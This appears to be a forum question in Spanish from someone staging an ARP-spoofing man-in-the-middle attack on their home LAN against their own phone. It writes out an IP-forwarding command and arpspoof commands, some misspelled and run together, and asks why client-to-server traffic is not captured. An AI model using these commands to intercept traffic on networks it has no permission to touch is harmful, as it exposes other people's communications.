Estoy intentando un ataque MTIM en la LAN de mi casa solo por diversión. Estoy usando arpspoof que viene preinstalado con la distribución de Linux que estoy usando. El problema que tengo es que puedo ver el tráfico del servidor al cliente, pero no el tráfico del cliente al servidor.
Estas son las direcciones IP en uso:
- Atacante: 192.168.0.4
- Víctima (mi teléfono): 192.168.0.2
- Puerta de enlace: 192.168.0.1
Estos son los comandos que uso para el ataque MitM:
-
Habilitando el reenvío de IP en mi máquina atacante usando este comando:
echo 1 > /proc/sys/net/ipv4/ip_forward -
Ahora uso un comando arpspoof para indicar a las computadoras que soy la puerta de enlace:
arpsoof -i eth0 -t victimip gatewayip arpspoof -i eth0 -t gatewayip victimip -
Luego inicio Wireshark, que es donde no puedo ver el tráfico del cliente al servidor.
¿Me estoy perdiendo un paso?